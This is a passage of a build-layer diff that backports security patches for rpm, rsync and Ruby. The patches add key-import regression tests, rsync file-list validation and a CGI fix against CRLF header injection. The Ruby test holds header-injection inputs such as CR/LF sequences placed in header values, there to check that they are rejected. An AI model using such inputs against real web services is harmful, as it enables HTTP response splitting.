++v9Nr3cZWqg5yJbDNZKfASdZgC85v3kkvhTtzknl//5wqdAMexbuwiIh2xyxbO+B/
++qqzZFrVmu3sV2Tj5lLZ/9p1qAuEM7ULbixd/ld8yTmYvQ4bBlKv2bmzXtVfF+ymB
++Tm6BzyQEl/MAEQEAAYkBHwQYAQgACQUCWOY5GAIbDAAKCRBDRFkeGWTF/PANB/9j
++mifmj6z/EPe0PJFhrpISt9PjiUQCt0IPtiL5zKAkWjHePIzyi+0kCTBF6DDLFxos
++3vN4bWnVKT1kBhZAQlPqpJTg+m74JUYeDGCdNx9SK7oRllATqyu+5rncgxjWVPnQ
++zu/HRPlWJwcVFYEVXYL8xzfantwQTqefjmcRmBRdA2XJITK+hGWwAmrqAWx+q5xX
++Pa8wkNMxVzNS2rUKO9SoVuJ/wlUvfoShkJ/VJ5HDp3qzUqncADfdGN35TDzscngQ
++gHvnMwVBfYfSCABV1hNByoZcc/kxkrWMmsd/EnIyLd1Q1baKqc3cEDuC6E6/o4yJ
++E4XX4jtDmdZPreZALsiB
++=rRop
++-----END PGP PUBLIC KEY BLOCK-----
++
+diff --git a/tests/rpmsigdig.at b/tests/rpmsigdig.at
+index 0f8f2b4884..c8b9f139e1 100644
+--- a/tests/rpmsigdig.at
++++ b/tests/rpmsigdig.at
+@@ -240,6 +240,34 @@ gpg(185e6146f00650f8) = 4:185e6146f00650f8-58e63918
+ [])
+ AT_CLEANUP
+
++AT_SETUP([rpmkeys --import invalid keys])
++AT_KEYWORDS([rpmkeys import])
++RPMDB_INIT
++
++AT_CHECK([
++runroot rpmkeys --import /data/keys/CVE-2021-3521-badbind.asc
++],
++[1],
++[],
++[error: /data/keys/CVE-2021-3521-badbind.asc: key 1 import failed.]
++)
++AT_CHECK([
++runroot rpmkeys --import /data/keys/CVE-2021-3521-nosubsig.asc
++],
++[1],
++[],
++[error: /data/keys/CVE-2021-3521-nosubsig.asc: key 1 import failed.]
++)
++
++AT_CHECK([
++runroot rpmkeys --import /data/keys/CVE-2021-3521-nosubsig-last.asc
++],
++[1],
++[],
++[error: /data/keys/CVE-2021-3521-nosubsig-last.asc: key 1 import failed.]
++)
++AT_CLEANUP
++
+ # ------------------------------
+ # Test pre-built package verification
+ AT_SETUP([rpmkeys -K <signed> 1])
+
diff --git a/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb b/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb
index 4029217d08..4d605c8501 100644
--- a/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb
+++ b/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb
@@ -24,7 +24,7 @@ HOMEPAGE = "http://www.rpm.org"
LICENSE = "GPL-2.0"
LIC_FILES_CHKSUM = "file://COPYING;md5=c0bf017c0fd1920e6158a333acabfd4a"
-SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.14.x \
+SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.14.x;protocol=https \
file://0001-Do-not-add-an-unsatisfiable-dependency-when-building.patch \
file://0001-Do-not-read-config-files-from-HOME.patch \
file://0001-When-cross-installing-execute-package-scriptlets-wit.patch \
@@ -44,6 +44,13 @@ SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.14.x \
file://0001-mono-find-provides-requires-do-not-use-monodis-from-.patch \
file://0001-Rip-out-partial-support-for-unused-MD2-and-RIPEMD160.patch \
file://0001-rpmplugins.c-call-dlerror-prior-to-dlsym.patch \
+ file://0001-rpmio-Fix-lzopen_internal-mode-parsing-when-Tn-is-us.patch \
+ file://CVE-2021-3421.patch \
+ file://CVE-2021-20266.patch \
+ file://CVE-2021-3521-01.patch \
+ file://CVE-2021-3521-02.patch \
+ file://CVE-2021-3521-03.patch \
+ file://CVE-2021-3521.patch \
"
PE = "1"
@@ -60,7 +67,8 @@ export PYTHON_ABI
# OE-core patches autoreconf to additionally run gnu-configize, which fails with this recipe
EXTRA_AUTORECONF_append = " --exclude=gnu-configize"
-EXTRA_OECONF_append = " --without-lua --enable-python --with-crypto=openssl"
+# Vendor is detected differently on x86 and aarch64 hosts and can feed into target packages
+EXTRA_OECONF_append = " --without-lua --enable-python --with-crypto=openssl --with-vendor=pc"
EXTRA_OECONF_append_libc-musl = " --disable-nls"
# --sysconfdir prevents rpm from attempting to access machine-specific configuration in sysroot/etc; we need to have it in rootfs
diff --git a/meta/recipes-devtools/rsync/files/0001-Fix-relative-when-copying-an-absolute-path.patch b/meta/recipes-devtools/rsync/files/0001-Fix-relative-when-copying-an-absolute-path.patch
new file mode 100644
index 0000000000..b2e02dba97
--- /dev/null
+++ b/meta/recipes-devtools/rsync/files/0001-Fix-relative-when-copying-an-absolute-path.patch
@@ -0,0 +1,31 @@
+From fabef23bea6e9963c06e218586fda1a823e3c6bf Mon Sep 17 00:00:00 2001
+From: Wayne Davison <wayne@opencoder.net>
+Date: Mon, 8 Aug 2022 21:30:21 -0700
+Subject: [PATCH] Fix --relative when copying an absolute path.
+
+CVE: CVE-2022-29154
+Upstream-Status: Backport [https://github.com/WayneD/rsync/commit/fabef23bea6e9963c06e218586fda1a823e3c6bf]
+Signed-off-by: Matthias Schmitz <matthias.schmitz@port4949.net>
+---
+ exclude.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/exclude.c b/exclude.c
+index 2394023f..ba5ca5a3 100644
+--- a/exclude.c
++++ b/exclude.c
+@@ -434,8 +434,10 @@ void add_implied_include(const char *arg)
+ *p++ = *cp++;
+ break;
+ case '/':
+- if (p[-1] == '/') /* This is safe because of the initial slash. */
++ if (p[-1] == '/') { /* This is safe because of the initial slash. */
++ cp++;
+ break;
++ }
+ if (relative_paths) {
+ filter_rule const *ent;
+ int found = 0;
+--
+2.39.2
+
diff --git a/meta/recipes-devtools/rsync/files/CVE-2022-29154.patch b/meta/recipes-devtools/rsync/files/CVE-2022-29154.patch
new file mode 100644
index 0000000000..61e4e03254
--- /dev/null
+++ b/meta/recipes-devtools/rsync/files/CVE-2022-29154.patch
@@ -0,0 +1,334 @@
+From b7231c7d02cfb65d291af74ff66e7d8c507ee871 Mon Sep 17 00:00:00 2001
+From: Wayne Davison <wayne@opencoder.net>
+Date: Sun, 31 Jul 2022 16:55:34 -0700
+Subject: [PATCH] Some extra file-list safety checks.
+
+CVE-2022-29154 rsync: remote arbitrary files write inside the
+
+Upstream-Status: Backport from [https://git.samba.org/?p=rsync.git;a=patch;h=b7231c7d02cfb65d291af74ff66e7d8c507ee871]
+CVE:CVE-2022-29154
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ exclude.c | 127 ++++++++++++++++++++++++++++++++++++++++++++++++++++-
+ flist.c | 17 ++++++-
+ io.c | 4 ++
+ main.c | 7 ++-
+ receiver.c | 11 +++--
+ 5 files changed, 158 insertions(+), 8 deletions(-)
+
+diff --git a/exclude.c b/exclude.c
+index 7989fb3..e146e96 100644
+--- a/exclude.c
++++ b/exclude.c
+@@ -26,16 +26,21 @@ extern int am_server;
+ extern int am_sender;
+ extern int eol_nulls;
+ extern int io_error;
++extern int xfer_dirs;
++extern int recurse;
+ extern int local_server;
+ extern int prune_empty_dirs;
+ extern int ignore_perishable;
++extern int relative_paths;
+ extern int delete_mode;
+ extern int delete_excluded;
+ extern int cvs_exclude;
+ extern int sanitize_paths;
+ extern int protocol_version;
++extern int list_only;
+ extern int module_id;
+
++extern char *filesfrom_host;
+ extern char curr_dir[MAXPATHLEN];
+ extern unsigned int curr_dir_len;
+ extern unsigned int module_dirlen;
+@@ -43,8 +48,10 @@ extern unsigned int module_dirlen;
+ filter_rule_list filter_list = { .debug_type = "" };
+ filter_rule_list cvs_filter_list = { .debug_type = " [global CVS]" };
+ filter_rule_list daemon_filter_list = { .debug_type = " [daemon]" };
++filter_rule_list implied_filter_list = { .debug_type = " [implied]" };
+
+ int saw_xattr_filter = 0;
++int trust_sender_filter = 0;
+
+ /* Need room enough for ":MODS " prefix plus some room to grow. */
+ #define MAX_RULE_PREFIX (16)
+@@ -293,6 +300,123 @@ static void add_rule(filter_rule_list *listp, const char *pat, unsigned int pat_
+ }
+ }
+
++/* Each arg the client sends to the remote sender turns into an implied include
++ * that the receiver uses to validate the file list from the sender. */
++void add_implied_include(const char *arg)
++{
++ filter_rule *rule;
++ int arg_len, saw_wild = 0, backslash_cnt = 0;
++ int slash_cnt = 1; /* We know we're adding a leading slash. */
++ const char *cp;
++ char *p;
++ if (relative_paths) {
++ cp = strstr(arg, "/./");
++ if (cp)
++ arg = cp+3;
++ } else {
++ if ((cp = strrchr(arg, '/')) != NULL)
++ arg = cp + 1;
++ }
++ arg_len = strlen(arg);
++ if (arg_len) {
++ if (strpbrk(arg, "*[?")) {
++ /* We need to add room to escape backslashes if wildcard chars are present. */
++ cp = arg;
++ while ((cp = strchr(cp, '\\')) != NULL) {
++ arg_len++;
++ cp++;
++ }
++ saw_wild = 1;
++ }
++ arg_len++; /* Leave room for the prefixed slash */
++ rule = new0(filter_rule);
++ if (!implied_filter_list.head)
++ implied_filter_list.head = implied_filter_list.tail = rule;
++ else {
++ rule->next = implied_filter_list.head;
++ implied_filter_list.head = rule;
++ }
++ rule->rflags = FILTRULE_INCLUDE + (saw_wild ? FILTRULE_WILD : 0);
++ p = rule->pattern = new_array(char, arg_len + 1);
++ *p++ = '/';
++ cp = arg;
++ while (*cp) {
++ switch (*cp) {
++ case '\\':
++ backslash_cnt++;
++ if (saw_wild)
++ *p++ = '\\';
++ *p++ = *cp++;
++ break;
++ case '/':
++ if (p[-1] == '/') /* This is safe because of the initial slash. */
++ break;
++ if (relative_paths) {
++ filter_rule const *ent;
++ int found = 0;
++ *p = '\0';
++ for (ent = implied_filter_list.head; ent; ent = ent->next) {
++ if (ent != rule && strcmp(ent->pattern, rule->pattern) == 0)
++ found = 1;
++ }
++ if (!found) {
++ filter_rule *R_rule = new0(filter_rule);
++ R_rule->rflags = FILTRULE_INCLUDE + (saw_wild ? FILTRULE_WILD : 0);
++ R_rule->pattern = strdup(rule->pattern);
++ R_rule->u.slash_cnt = slash_cnt;
++ R_rule->next = implied_filter_list.head;
++ implied_filter_list.head = R_rule;
++ }
++ }
++ slash_cnt++;
++ *p++ = *cp++;
++ break;
++ default:
++ *p++ = *cp++;
++ break;
++ }
++ }
++ *p = '\0';
++ rule->u.slash_cnt = slash_cnt;
++ arg = (const char *)rule->pattern;
++ }
++
++ if (recurse || xfer_dirs) {
++ /* Now create a rule with an added "/" & "**" or "*" at the end */
++ rule = new0(filter_rule);
++ if (recurse)
++ rule->rflags = FILTRULE_INCLUDE | FILTRULE_WILD | FILTRULE_WILD2;
++ else
++ rule->rflags = FILTRULE_INCLUDE | FILTRULE_WILD;
++ /* A +4 in the len leaves enough room for / * * \0 or / * \0 \0 */
++ if (!saw_wild && backslash_cnt) {
++ /* We are appending a wildcard, so now the backslashes need to be escaped. */
++ p = rule->pattern = new_array(char, arg_len + backslash_cnt + 3 + 1);
++ cp = arg;
++ while (*cp) {
++ if (*cp == '\\')
++ *p++ = '\\';
++ *p++ = *cp++;
++ }
++ } else {
++ p = rule->pattern = new_array(char, arg_len + 3 + 1);
++ if (arg_len) {
++ memcpy(p, arg, arg_len);
++ p += arg_len;
++ }
++ }
++ if (p[-1] != '/')
++ *p++ = '/';
++ *p++ = '*';
++ if (recurse)
++ *p++ = '*';
++ *p = '\0';
++ rule->u.slash_cnt = slash_cnt + 1;
++ rule->next = implied_filter_list.head;
++ implied_filter_list.head = rule;
++ }
++}
++
+ /* This frees any non-inherited items, leaving just inherited items on the list. */
+ static void pop_filter_list(filter_rule_list *listp)
+ {
+@@ -721,7 +845,7 @@ static void report_filter_result(enum logcode code, char const *name,
+ : name_flags & NAME_IS_DIR ? "directory"
+ : "file";
+ rprintf(code, "[%s] %sing %s %s because of pattern %s%s%s\n",
+- w, actions[*w!='s'][!(ent->rflags & FILTRULE_INCLUDE)],
++ w, actions[*w=='g'][!(ent->rflags & FILTRULE_INCLUDE)],
+ t, name, ent->pattern,
+ ent->rflags & FILTRULE_DIRECTORY ? "/" : "", type);
+ }
+@@ -894,6 +1018,7 @@ static filter_rule *parse_rule_tok(const char **rulestr_ptr,
+ }
+ switch (ch) {
+ case ':':
++ trust_sender_filter = 1;
+ rule->rflags |= FILTRULE_PERDIR_MERGE
+ | FILTRULE_FINISH_SETUP;
+ /* FALL THROUGH */
+diff --git a/flist.c b/flist.c
+index 499440c..630d685 100644
+--- a/flist.c
++++ b/flist.c
+@@ -70,6 +70,7 @@ extern int need_unsorted_flist;
+ extern int sender_symlink_iconv;
+ extern int output_needs_newline;
+ extern int sender_keeps_checksum;
++extern int trust_sender_filter;
+ extern int unsort_ndx;
+ extern uid_t our_uid;
+ extern struct stats stats;
+@@ -80,8 +81,7 @@ extern char curr_dir[MAXPATHLEN];
+
+ extern struct chmod_mode_struct *chmod_modes;
+
+-extern filter_rule_list filter_list;
+-extern filter_rule_list daemon_filter_list;
++extern filter_rule_list filter_list, implied_filter_list, daemon_filter_list;
+
+ #ifdef ICONV_OPTION
+ extern int filesfrom_convert;
+@@ -904,6 +904,19 @@ static struct file_struct *recv_file_entry(int f, struct file_list *flist, int x
+ exit_cleanup(RERR_UNSUPPORTED);
+ }
+
++ if (*thisname != '.' || thisname[1] != '\0') {
++ int filt_flags = S_ISDIR(mode) ? NAME_IS_DIR : NAME_IS_FILE;
++ if (!trust_sender_filter /* a per-dir filter rule means we must trust the sender's filtering */
++ && filter_list.head && check_filter(&filter_list, FINFO, thisname, filt_flags) < 0) {
++ rprintf(FERROR, "ERROR: rejecting excluded file-list name: %s\n", thisname);
++ exit_cleanup(RERR_PROTOCOL);
++ }
++ if (implied_filter_list.head && check_filter(&implied_filter_list, FINFO, thisname, filt_flags) <= 0) {
++ rprintf(FERROR, "ERROR: rejecting unrequested file-list name: %s\n", thisname);
++ exit_cleanup(RERR_PROTOCOL);
++ }
++ }
++
+ if (inc_recurse && S_ISDIR(mode)) {
+ if (one_file_system) {
+ /* Room to save the dir's device for -x */
+diff --git a/io.c b/io.c
+index c04dbd5..698a7da 100644
+--- a/io.c
++++ b/io.c
+@@ -415,6 +415,7 @@ static void forward_filesfrom_data(void)
+ while (s != eob) {
+ if (*s++ == '\0') {
+ ff_xb.len = s - sob - 1;
++ add_implied_include(sob);
+ if (iconvbufs(ic_send, &ff_xb, &iobuf.out, flags) < 0)
+ exit_cleanup(RERR_PROTOCOL); /* impossible? */
+ write_buf(iobuf.out_fd, s-1, 1); /* Send the '\0'. */
+@@ -446,9 +447,12 @@ static void forward_filesfrom_data(void)
+ char *f = ff_xb.buf + ff_xb.pos;
+ char *t = ff_xb.buf;
+ char *eob = f + len;
++ char *cur = t;
+ /* Eliminate any multi-'\0' runs. */
+ while (f != eob) {
+ if (!(*t++ = *f++)) {
++ add_implied_include(cur);
++ cur = t;
+ while (f != eob && *f == '\0')
+ f++;
+ }
+diff --git a/main.c b/main.c
+index ee9630f..6ec56e7 100644
+--- a/main.c
++++ b/main.c
+@@ -78,6 +78,7 @@ extern BOOL flist_receiving_enabled;
+ extern BOOL shutting_down;
+ extern int backup_dir_len;
+ extern int basis_dir_cnt;
++extern int trust_sender_filter;
+ extern struct stats stats;
+ extern char *stdout_format;
+ extern char *logfile_format;
+@@ -93,7 +94,7 @@ extern char curr_dir[MAXPATHLEN];
+ extern char backup_dir_buf[MAXPATHLEN];
+ extern char *basis_dir[MAX_BASIS_DIRS+1];
+ extern struct file_list *first_flist;
+-extern filter_rule_list daemon_filter_list;
++extern filter_rule_list daemon_filter_list, implied_filter_list;
+
+ uid_t our_uid;
+ gid_t our_gid;
+@@ -534,6 +535,7 @@ static pid_t do_cmd(char *cmd, char *machine, char *user, char **remote_argv, in
+ #ifdef ICONV_CONST
+ setup_iconv();
+ #endif
++ trust_sender_filter = 1;
+ } else if (local_server) {
+ /* If the user didn't request --[no-]whole-file, force
+ * it on, but only if we're not batch processing. */
+@@ -1358,6 +1360,8 @@ static int start_client(int argc, char *argv[])
+ char *dummy_host;
+ int dummy_port = rsync_port;
+ int i;
++ if (filesfrom_fd < 0)
++ add_implied_include(remote_argv[0]);
+ /* For remote source, any extra source args must have either
+ * the same hostname or an empty hostname. */
+ for (i = 1; i < remote_argc; i++) {
+@@ -1381,6 +1385,7 @@ static int start_client(int argc, char *argv[])
+ if (!rsync_port && !*arg) /* Turn an empty arg into a dot dir. */
+ arg = ".";
+ remote_argv[i] = arg;
++ add_implied_include(arg);
+ }
+ }
+
+diff --git a/receiver.c b/receiver.c
+index d6a48f1..c0aa893 100644
+--- a/receiver.c
++++ b/receiver.c
+@@ -577,10 +577,13 @@ int recv_files(int f_in, int f_out, char *local_name)
+ if (DEBUG_GTE(RECV, 1))
+ rprintf(FINFO, "recv_files(%s)\n", fname);
+
+- if (daemon_filter_list.head && (*fname != '.' || fname[1] != '\0')
+- && check_filter(&daemon_filter_list, FLOG, fname, 0) < 0) {
+- rprintf(FERROR, "attempt to hack rsync failed.\n");
+- exit_cleanup(RERR_PROTOCOL);
++ if (daemon_filter_list.head && (*fname != '.' || fname[1] != '\0')) {
++ int filt_flags = S_ISDIR(file->mode) ? NAME_IS_DIR : NAME_IS_FILE;
++ if (check_filter(&daemon_filter_list, FLOG, fname, filt_flags) < 0) {
++ rprintf(FERROR, "ERROR: rejecting file transfer request for daemon excluded file: %s\n",
++ fname);
++ exit_cleanup(RERR_PROTOCOL);
++ }
+ }
+
+ #ifdef SUPPORT_XATTRS
+--
+2.30.2
+
diff --git a/meta/recipes-devtools/rsync/rsync_3.1.3.bb b/meta/recipes-devtools/rsync/rsync_3.1.3.bb
index 152ff02a25..c744503227 100644
--- a/meta/recipes-devtools/rsync/rsync_3.1.3.bb
+++ b/meta/recipes-devtools/rsync/rsync_3.1.3.bb
@@ -1,5 +1,6 @@
SUMMARY = "File synchronization tool"
HOMEPAGE = "http://rsync.samba.org/"
+DESCRIPTION = "rsync is an open source utility that provides fast incremental file transfer."
BUGTRACKER = "http://rsync.samba.org/bugzilla.html"
SECTION = "console/network"
# GPLv2+ (<< 3.0.0), GPLv3+ (>= 3.0.0)
@@ -15,6 +16,8 @@ SRC_URI = "https://download.samba.org/pub/${BPN}/src/${BP}.tar.gz \
file://CVE-2016-9841.patch \
file://CVE-2016-9842.patch \
file://CVE-2016-9843.patch \
+ file://CVE-2022-29154.patch \
+ file://0001-Fix-relative-when-copying-an-absolute-path.patch \
"
SRC_URI[md5sum] = "1581a588fde9d89f6bc6201e8129afaf"
diff --git a/meta/recipes-devtools/ruby/ruby.inc b/meta/recipes-devtools/ruby/ruby.inc
index a38b3fe624..a9f4240932 100644
--- a/meta/recipes-devtools/ruby/ruby.inc
+++ b/meta/recipes-devtools/ruby/ruby.inc
@@ -14,8 +14,8 @@ LIC_FILES_CHKSUM = "\
file://LEGAL;md5=2b6d62dc0d608f34d510ca3f428110ec \
"
-DEPENDS = "ruby-native zlib openssl tcl libyaml gdbm readline libffi"
-DEPENDS_class-native = "openssl-native libyaml-native readline-native zlib-native"
+DEPENDS = "zlib openssl libyaml gdbm readline libffi"
+DEPENDS_append_class-target = " ruby-native"
SHRT_VER = "${@oe.utils.trim_version("${PV}", 2)}"
SRC_URI = "http://cache.ruby-lang.org/pub/ruby/${SHRT_VER}/ruby-${PV}.tar.gz \
diff --git a/meta/recipes-devtools/ruby/ruby/0001-template-Makefile.in-do-not-write-host-cross-cc-item.patch b/meta/recipes-devtools/ruby/ruby/0001-template-Makefile.in-do-not-write-host-cross-cc-item.patch
new file mode 100644
index 0000000000..826daf2cda
--- /dev/null
+++ b/meta/recipes-devtools/ruby/ruby/0001-template-Makefile.in-do-not-write-host-cross-cc-item.patch
@@ -0,0 +1,32 @@
+From 2368d07660a93a2c41d63f3ab6054ca4daeef820 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Tue, 17 Nov 2020 18:31:40 +0000
+Subject: [PATCH] template/Makefile.in: do not write host cross-cc items into
+ target config
+
+This helps reproducibility.
+
+Upstream-Status: Inapproppriate [oe-core specific]
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ template/Makefile.in | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/template/Makefile.in b/template/Makefile.in
+index 10dc826..940ee07 100644
+--- a/template/Makefile.in
++++ b/template/Makefile.in
+@@ -657,11 +657,11 @@ mjit_config.h:
+ echo '#endif'; \
+ quote MJIT_MIN_HEADER_NAME "$(MJIT_MIN_HEADER_NAME)"; \
+ sep=,; \
+- quote "MJIT_CC_COMMON " $(MJIT_CC); \
++ quote "MJIT_CC_COMMON " ; \
+ quote "MJIT_CFLAGS MJIT_ARCHFLAG" $(MJIT_CFLAGS); \
+ quote "MJIT_OPTFLAGS " $(MJIT_OPTFLAGS); \
+ quote "MJIT_DEBUGFLAGS " $(MJIT_DEBUGFLAGS); \
+- quote "MJIT_LDSHARED " $(MJIT_LDSHARED); \
++ quote "MJIT_LDSHARED " ; \
+ quote "MJIT_DLDFLAGS MJIT_ARCHFLAG" $(MJIT_DLDFLAGS); \
+ quote "MJIT_LIBS " $(LIBRUBYARG_SHARED); \
+ quote 'PRELOADENV "@PRELOADENV@"'; \
diff --git a/meta/recipes-devtools/ruby/ruby/CVE-2020-25613.patch b/meta/recipes-devtools/ruby/ruby/CVE-2020-25613.patch
deleted file mode 100644
index 1abcb7547e..0000000000
--- a/meta/recipes-devtools/ruby/ruby/CVE-2020-25613.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From 8946bb38b4d87549f0d99ed73c62c41933f97cc7 Mon Sep 17 00:00:00 2001
-From: Yusuke Endoh <mame@ruby-lang.org>
-Date: Tue, 29 Sep 2020 13:15:58 +0900
-Subject: [PATCH] Make it more strict to interpret some headers
-
-Some regexps were too tolerant.
-
-Upstream-Status: Backport
-[https://github.com/ruby/webrick/commit/8946bb38b4d87549f0d99ed73c62c41933f97cc7]
-CVE: CVE-2020-25613
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
----
- lib/webrick/httprequest.rb | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/lib/webrick/httprequest.rb b/lib/webrick/httprequest.rb
-index 294bd91..d34eac7 100644
---- a/lib/webrick/httprequest.rb
-+++ b/lib/webrick/httprequest.rb
-@@ -227,9 +227,9 @@ def parse(socket=nil)
- raise HTTPStatus::BadRequest, "bad URI `#{@unparsed_uri}'."
- end
-
-- if /close/io =~ self["connection"]
-+ if /\Aclose\z/io =~ self["connection"]
- @keep_alive = false
-- elsif /keep-alive/io =~ self["connection"]
-+ elsif /\Akeep-alive\z/io =~ self["connection"]
- @keep_alive = true
- elsif @http_version < "1.1"
- @keep_alive = false
-@@ -508,7 +508,7 @@ def read_body(socket, block)
- return unless socket
- if tc = self['transfer-encoding']
- case tc
-- when /chunked/io then read_chunked(socket, block)
-+ when /\Achunked\z/io then read_chunked(socket, block)
- else raise HTTPStatus::NotImplemented, "Transfer-Encoding: #{tc}."
- end
- elsif self['content-length'] || @remaining_size
diff --git a/meta/recipes-devtools/ruby/ruby/CVE-2021-33621.patch b/meta/recipes-devtools/ruby/ruby/CVE-2021-33621.patch
new file mode 100644
index 0000000000..cc2f9853db
--- /dev/null
+++ b/meta/recipes-devtools/ruby/ruby/CVE-2021-33621.patch
@@ -0,0 +1,139 @@
+From 64c5045c0a6b84fdb938a8465a0890e5f7162708 Mon Sep 17 00:00:00 2001
+From: Yusuke Endoh <mame@ruby-lang.org>
+Date: Tue, 22 Nov 2022 10:49:27 +0900
+Subject: [PATCH] Prevent CRLF injection
+
+Throw a RuntimeError if the HTTP response header contains CR or LF to
+prevent HTTP response splitting.
+
+https://hackerone.com/reports/1204695
+
+Upstream-Status: Backport [https://github.com/ruby/cgi/commit/64c5045c0a6b84fdb938a8465a0890e5f7162708]
+CVE: CVE-2021-33621
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ lib/cgi/core.rb | 45 +++++++++++++++++++++++--------------
+ test/cgi/test_cgi_header.rb | 8 +++++++
+ 2 files changed, 36 insertions(+), 17 deletions(-)
+
+diff --git a/lib/cgi/core.rb b/lib/cgi/core.rb
+index bec76e0..62e6068 100644
+--- a/lib/cgi/core.rb
++++ b/lib/cgi/core.rb
+@@ -188,17 +188,28 @@ class CGI
+ # Using #header with the HTML5 tag maker will create a <header> element.
+ alias :header :http_header
+
++ def _no_crlf_check(str)
++ if str
++ str = str.to_s
++ raise "A HTTP status or header field must not include CR and LF" if str =~ /[\r\n]/
++ str
++ else
++ nil
++ end
++ end
++ private :_no_crlf_check
++
+ def _header_for_string(content_type) #:nodoc:
+ buf = ''.dup
+ if nph?()
+- buf << "#{$CGI_ENV['SERVER_PROTOCOL'] || 'HTTP/1.0'} 200 OK#{EOL}"
++ buf << "#{_no_crlf_check($CGI_ENV['SERVER_PROTOCOL']) || 'HTTP/1.0'} 200 OK#{EOL}"
+ buf << "Date: #{CGI.rfc1123_date(Time.now)}#{EOL}"
+- buf << "Server: #{$CGI_ENV['SERVER_SOFTWARE']}#{EOL}"
++ buf << "Server: #{_no_crlf_check($CGI_ENV['SERVER_SOFTWARE'])}#{EOL}"
+ buf << "Connection: close#{EOL}"
+ end
+- buf << "Content-Type: #{content_type}#{EOL}"
++ buf << "Content-Type: #{_no_crlf_check(content_type)}#{EOL}"
+ if @output_cookies
+- @output_cookies.each {|cookie| buf << "Set-Cookie: #{cookie}#{EOL}" }
++ @output_cookies.each {|cookie| buf << "Set-Cookie: #{_no_crlf_check(cookie)}#{EOL}" }
+ end
+ return buf
+ end # _header_for_string
+@@ -213,9 +224,9 @@ class CGI
+ ## NPH
+ options.delete('nph') if defined?(MOD_RUBY)
+ if options.delete('nph') || nph?()
+- protocol = $CGI_ENV['SERVER_PROTOCOL'] || 'HTTP/1.0'
++ protocol = _no_crlf_check($CGI_ENV['SERVER_PROTOCOL']) || 'HTTP/1.0'
+ status = options.delete('status')
+- status = HTTP_STATUS[status] || status || '200 OK'
++ status = HTTP_STATUS[status] || _no_crlf_check(status) || '200 OK'
+ buf << "#{protocol} #{status}#{EOL}"
+ buf << "Date: #{CGI.rfc1123_date(Time.now)}#{EOL}"
+ options['server'] ||= $CGI_ENV['SERVER_SOFTWARE'] || ''
+@@ -223,38 +234,38 @@ class CGI
+ end
+ ## common headers
+ status = options.delete('status')
+- buf << "Status: #{HTTP_STATUS[status] || status}#{EOL}" if status
++ buf << "Status: #{HTTP_STATUS[status] || _no_crlf_check(status)}#{EOL}" if status
+ server = options.delete('server')
+- buf << "Server: #{server}#{EOL}" if server
++ buf << "Server: #{_no_crlf_check(server)}#{EOL}" if server
+ connection = options.delete('connection')
+- buf << "Connection: #{connection}#{EOL}" if connection
++ buf << "Connection: #{_no_crlf_check(connection)}#{EOL}" if connection
+ type = options.delete('type')
+- buf << "Content-Type: #{type}#{EOL}" #if type
++ buf << "Content-Type: #{_no_crlf_check(type)}#{EOL}" #if type
+ length = options.delete('length')
+- buf << "Content-Length: #{length}#{EOL}" if length
++ buf << "Content-Length: #{_no_crlf_check(length)}#{EOL}" if length
+ language = options.delete('language')
+- buf << "Content-Language: #{language}#{EOL}" if language
++ buf << "Content-Language: #{_no_crlf_check(language)}#{EOL}" if language
+ expires = options.delete('expires')
+ buf << "Expires: #{CGI.rfc1123_date(expires)}#{EOL}" if expires
+ ## cookie
+ if cookie = options.delete('cookie')
+ case cookie
+ when String, Cookie
+- buf << "Set-Cookie: #{cookie}#{EOL}"
++ buf << "Set-Cookie: #{_no_crlf_check(cookie)}#{EOL}"
+ when Array
+ arr = cookie
+- arr.each {|c| buf << "Set-Cookie: #{c}#{EOL}" }
++ arr.each {|c| buf << "Set-Cookie: #{_no_crlf_check(c)}#{EOL}" }
+ when Hash
+ hash = cookie
+- hash.each_value {|c| buf << "Set-Cookie: #{c}#{EOL}" }
++ hash.each_value {|c| buf << "Set-Cookie: #{_no_crlf_check(c)}#{EOL}" }
+ end
+ end
+ if @output_cookies
+- @output_cookies.each {|c| buf << "Set-Cookie: #{c}#{EOL}" }
++ @output_cookies.each {|c| buf << "Set-Cookie: #{_no_crlf_check(c)}#{EOL}" }
+ end
+ ## other headers
+ options.each do |key, value|
+- buf << "#{key}: #{value}#{EOL}"
++ buf << "#{_no_crlf_check(key)}: #{_no_crlf_check(value)}#{EOL}"
+ end
+ return buf
+ end # _header_for_hash
+diff --git a/test/cgi/test_cgi_header.rb b/test/cgi/test_cgi_header.rb
+index bab2d03..ec2f4de 100644
+--- a/test/cgi/test_cgi_header.rb
++++ b/test/cgi/test_cgi_header.rb
+@@ -176,6 +176,14 @@ class CGIHeaderTest < Test::Unit::TestCase
+ end
+
+
++ def test_cgi_http_header_crlf_injection
++ cgi = CGI.new
++ assert_raise(RuntimeError) { cgi.http_header("text/xhtml\r\nBOO") }
++ assert_raise(RuntimeError) { cgi.http_header("type" => "text/xhtml\r\nBOO") }
++ assert_raise(RuntimeError) { cgi.http_header("status" => "200 OK\r\nBOO") }
++ assert_raise(RuntimeError) { cgi.http_header("location" => "text/xhtml\r\nBOO") }
++ end
++
+
+ instance_methods.each do |method|
+ private method if method =~ /^test_(.*)/ && $1 != ENV['TEST']
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/ruby/ruby/CVE-2023-28756.patch b/meta/recipes-devtools/ruby/ruby/CVE-2023-28756.patch
new file mode 100644
index 0000000000..c25a147d36
--- /dev/null
+++ b/meta/recipes-devtools/ruby/ruby/CVE-2023-28756.patch
@@ -0,0 +1,61 @@
+From 957bb7cb81995f26c671afce0ee50a5c660e540e Mon Sep 17 00:00:00 2001
